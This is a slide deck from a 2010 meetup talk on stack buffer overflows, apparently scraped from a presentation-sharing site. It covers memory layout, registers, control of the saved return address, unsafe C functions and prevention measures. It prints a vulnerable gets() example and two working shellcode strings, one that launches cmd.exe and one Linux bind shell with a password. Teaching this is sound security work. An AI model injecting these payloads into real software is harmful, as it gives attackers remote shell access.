View
2.340
Download
1
Embed Size (px)
DESCRIPTION
Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010
Citation preview
Buffer Overflows by: Saurabh Sharma
BUFFER
Buffer: The memory area where the user input is stored.
Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.
Anatomy of Buffer Overflows
void get_input() { char buf[1024]; gets(buf); } void main(int argc, char*argv[]){ get_input(); } User controls the input. Malicious user can supply
the input of more than 500 chars. So what ?? User can supply a malicious input which can
execute some other exe. This can also be your cmd.exe and may lead to the system compromise.
A small example
Text: Contains instructions
Data: Contains initialized variables
BSS: Contains uninitialized global and static variables(initialized to 0)
Heap: Contains dynamic, uninitialized data(malloc())
Stack: Contains function arguments and local variables
Memory overview
Stack Frame:holds variables and data for function
Stack grows from higher memory location to lower memory location
Heap: lower to higher
Memory overview
General purpose: For basic calculations.
ESI, EDI: Used mostly with arrays
Flags: Outcome of several instructions set the flags
Segment: Code, stack, data.
EBP:Base pointer, points to the beginning of the current stack frame
ESP: Stack pointer, points to the top of the stack
EIP: Instruction pointer, points to the next instruction
REGISTERS
Stack is a LIFO data structure. Temporary memory, formed when the function called.
A new stack frame created when the function is called.
The return address is saved just above the local variables.
Stack Layout
parameters
Return addr(saved EIP)Saved EBP
Local variables
Stack grows
Higher address
Lower address
So, if the EIP can be controlled, the next instruction to be executed can be controlled.
Stack Layout
parameters
Return addr(saved EIP)Saved EBP
Local variables
Stack grows
Higher address
Lower address
Machine code which is injected into the overflown buffer
Does the work for you
WORK: executing a third program, adding an administrator etc.
SHELLCODE
win32/xp sp2 (En) cmd.exe 23 bytes Author : Mountassif Moad A.K.A :
"\x8b\xec\x68\x65\x78\x65" "\x20\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8\x8D" "\x15\x86\x7C\xff\xd0";
EXAMPLE SHELLCODES(SMALL)
BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=
"\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a" "\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a" "\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9" "\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31" "\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05" "\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9" "\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0" "\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f" "\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31" "\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0" "\x01\xcd\x80"
EXAMPLE SHELLCODES(bigger)
DEMO
strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintf vscanf() vsscanf() streadd() strecpy() strtrns()
MAJOR SNARES
Buffer size must be checked Use alternative functions e.g. strncpy(dst,
src, dst_size-1) instead of strcpy(dst, src) Other protection mechanisms like /GS(stack
cookie), ASLR, SafeSEH compilation
PREVENTION
http://www.cccure.org/amazon/idssignature.pdf
http://www.shell-storm.org/papers/files/539.pdf
http://c0re.23.nu/~chris/data/bo-2004.pdf http://www-inst.eecs.berkeley.edu/~cs161/f
a08/papers/stack_smashing.pdf
REFERENCES
?????????????????
QUESTIONS